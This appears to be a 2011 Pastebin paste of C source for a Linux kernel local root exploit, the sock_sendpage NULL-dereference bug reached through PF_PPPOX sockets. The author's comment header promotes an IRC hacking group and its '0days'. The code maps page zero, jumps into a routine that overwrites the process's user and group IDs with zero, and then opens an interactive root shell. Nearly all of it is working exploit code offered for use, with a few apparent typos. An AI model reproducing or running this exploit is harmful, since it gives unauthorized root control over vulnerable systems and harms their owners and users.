API tools faq
paste
Advertisement
ZmEu

udp_sendpage.c / byxd of HaqNET

ZmEu
Feb 28th, 2011
511
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Clone C++ 4.23 KB | None | 0 0
raw download clone embed print report
  1. /* UDP PF_PPOX sendpage() , NOT sendmsg... this is round-2 and working on 2011 boxes.
  2. * There IS a grsec_bypass code around.. look hard and you shall see..
  3. * This rewrite was done by xd / haqnet irc - #Haqnet, FUCK EFNET! Join haqnet and watch vnc/SSHD and much much more in action! AND 0days you could only dream of...
  4. * Thanks to many people for help, even those who didnt help, for inspiring me to look harder for this exploit, specially in the_rebel exploit... and, found now a working, new 2011 selinux_bypass code (ref is on this pastebin, just search for selinux_bypass and itll show)
  5. * xd / irc.haqnet.net -ssl 6697 / ipv6.haqnet.net -ssl 6697 , Join us there and, you might even LIKE IT!
  6.  
  7. * ORIGINAL vuln found by multiple people, but the bug was never recoded and, have the addins it does now..wich are some defines wich are VERY cool...vulnerability was discovered by google security team
  8. in 2009 ,just now, it has no SVR_PERSONALITY code,and it compiles fine if you have it setup right.. if it does not compile for you, try
  9. some cmdline gcc like -fPOC etc... i wont help ya there but... i can safely say, 2 things, someone get me a damn php_loader! I would help dev it, or ill endup making one! BUT, i lost mine, no, seriously i did, and, am spewing because it was extremely simple,and was awesome code by awesome people at tr0ll.in :) greets to your ircd :)
  10. Again, xd says: JOIN US at the REAL, new, haqnet..wich has NEW,cpecial bots :), services/iipv6 and,ability to run XDCC,even i will supply working kits, for linux or win32! Hey, who would do this for Xdcc ? no one.. so join us!
  11. xd - 2011
  12. */
  13. #include <stdio.h>
  14. #include <sys/socket.h>
  15. #include <sys/user.h>
  16. #include <sys/types.h>
  17. #include <sys/wait.h>
  18. #include <inttypes.h>
  19. #include <sys/reg.h>
  20. #include <unistd.h>
  21. #include <stdio.h>
  22. #include <stdlib.h>
  23. #include <sys/mman.h>
  24.  
  25. static unsigned int uid, gid;
  26.  
  27. #define PAGE_SIZE getpagezize()
  28. /* had to add this codes in for RHEL and some other x86 boxes,but more importantly,because removed the SVR_PERSONALITY,this now replaces that, but simpler -xd */
  29. #define PF_PPPOX AF_PPPOX // had to add this for OLDER kernels compile
  30. #define AF_PPPOX 24
  31.  
  32. #define USER_CS 0x73
  33. #define USER_SS 0x7b
  34. #define USER_FL 0x246
  35. #define STACK(x) (x + sizeof(x) - 40)
  36.  
  37. void exit_code();
  38. char exit_stack[1024*1024];
  39.  
  40. static inline __attribute__((always_inline)) void *get_current() {
  41.     unsigned long curr;
  42.     __asm__ __volatile__ (
  43.     "movl %%esp, %%eax ;"
  44.     "andl %1, %%eax ;"
  45.     "movl (%%eax), %0"
  46.     : "=r" (curr)
  47.     : "i" (~8191)
  48.     );
  49.     return (void *) curr;
  50. }
  51.  
  52. static inline __attribute__((always_inline)) void exit_kernel() {
  53.     __asm__ __volatile__ (
  54.     "movl %0, 0x10(%%esp) ;"
  55.     "movl %1, 0x0c(%%esp) ;"
  56.     "movl %2, 0x08(%%esp) ;"
  57.     "movl %3, 0x04(%%esp) ;"
  58.     "movl %4, 0x00(%%esp) ;"
  59.     "iret"
  60.     : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  61.     "i" (USER_CS), "r" (exit_code)
  62.         );
  63. }
  64.  
  65. void kernel_code() {
  66.     int i;
  67.     uint *p = get_current();
  68.     for (i = 0; i < 1024-13; i++) {
  69.     if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
  70.     p[0] = p[1] = p[2] = p[3] = 0;
  71.     p[4] = p[5] = p[6] = p[7] = 0;
  72.     p = (uint *) ((char *)(p + 8) + sizeof(void *));
  73.     p[0] = p[1] = p[2] = ~0;
  74.     break;
  75.     }
  76.     p++;
  77.     }
  78.     exit_kernel();
  79. }
  80.  
  81. void exit_code() {
  82.     if (getuid() != 0) {
  83.     fprintf(stderr, "[-] Failed to root.\n");
  84.     exit(-1);
  85.     }
  86.     fprintf(stderr, "[!] Got root.\n");
  87.     execl("/bin/sh", "/bin/sh", "-i", NULL);
  88. }
  89.  
  90. int main(void) {
  91.     char template[] = "/tmp/tmporary.XXXXXX";
  92.     int fdin, fdout;
  93.     void *page;
  94.     uid = getuid();
  95.     gid = getgid();
  96.     setresuid(uid, uid, uid);
  97.     setresgid(gid, gid, gid);
  98.     if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { // maybe need to READD PROT_EXEC here (xd)... or addin selinux bypas code..
  99.     perror("mmap failure");
  100.     return -1;
  101.     } else {
  102.     if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
  103.     perror("mprotect failure");
  104.     return -1;
  105.     }
  106.     }
  107.     *(char *)0 = '\x90';
  108.     *(char *)1 = '\xe9';
  109.     *(unsigned long *)2 = (unsigned long)&kernel_code - 6;
  110.     if ((fdin = mkstemp(template)) < 0) {
  111.     perror("mkstemp");
  112.     return -1;
  113.     }
  114.     if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
  115.     perror("socket");
  116.     return -1;
  117.     }
  118.     unlink(template);
  119.     ftruncate(fdin, PAGE_SIZE);
  120.     sendfile(fdout, fdin, NULL, PAGE_SIZE);
  121. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!